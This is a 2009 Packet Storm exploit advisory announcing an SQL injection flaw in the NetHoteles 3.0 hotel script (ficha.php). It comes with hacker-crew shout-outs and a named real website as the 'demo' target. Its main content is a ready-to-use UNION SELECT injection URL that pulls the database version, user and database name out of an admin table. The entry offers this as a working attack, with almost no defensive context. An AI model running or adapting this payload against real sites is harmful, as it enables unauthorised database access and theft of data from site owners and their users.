NetHoteles 3.0 SQL Injection

2009-04-16T00:00:00
ID PACKETSTORM:76723
Type packetstorm
Reporter Snakespc
Modified 2009-04-16T00:00:00

Description

                                        
                                            `-------------------------AllaH AkbaR-------------------------------  
NetHoteles v3.0 (ficha.php) SQL Injection Vulnerability   
---------------------------------------------------------------------------  
Discovered By: Snakespc ALGERIAN HaCkEr   
Mail: snakespc@gmail.com  
Site:http://www.snakespc.com/sc/index.php  
Chi3arona houa : Serra7 merra7 , koulchi mderra7>>>>  
Aflawa Kamikaz Wa4rin Fi kol Bla4s   
-------------------------SNAKES TEAM-------------------------------------  
Script:  
http://www.sierracazorla.com  
-------------------------SNAKES TEAM-------------------------------------  
Exploit:  
-----------  
Demo:  
http://www.sierracazorla.com/nethoteles/publico/ficha.php?id_establecimiento=-13%27+UNION%20SELECT%201,2,3,4,5,6,concat(@@version,0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+admin/*  
-------------------------SNAKES TEAM-------------------------------------  
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::  
Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::  
THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL  
--------------------------SNAKES TEAM------------------------------------  
ALL www.SnakespC.com/sc>>>> ( Members )  
Str0ke >>>>>>>Milw0rm  
  
  
`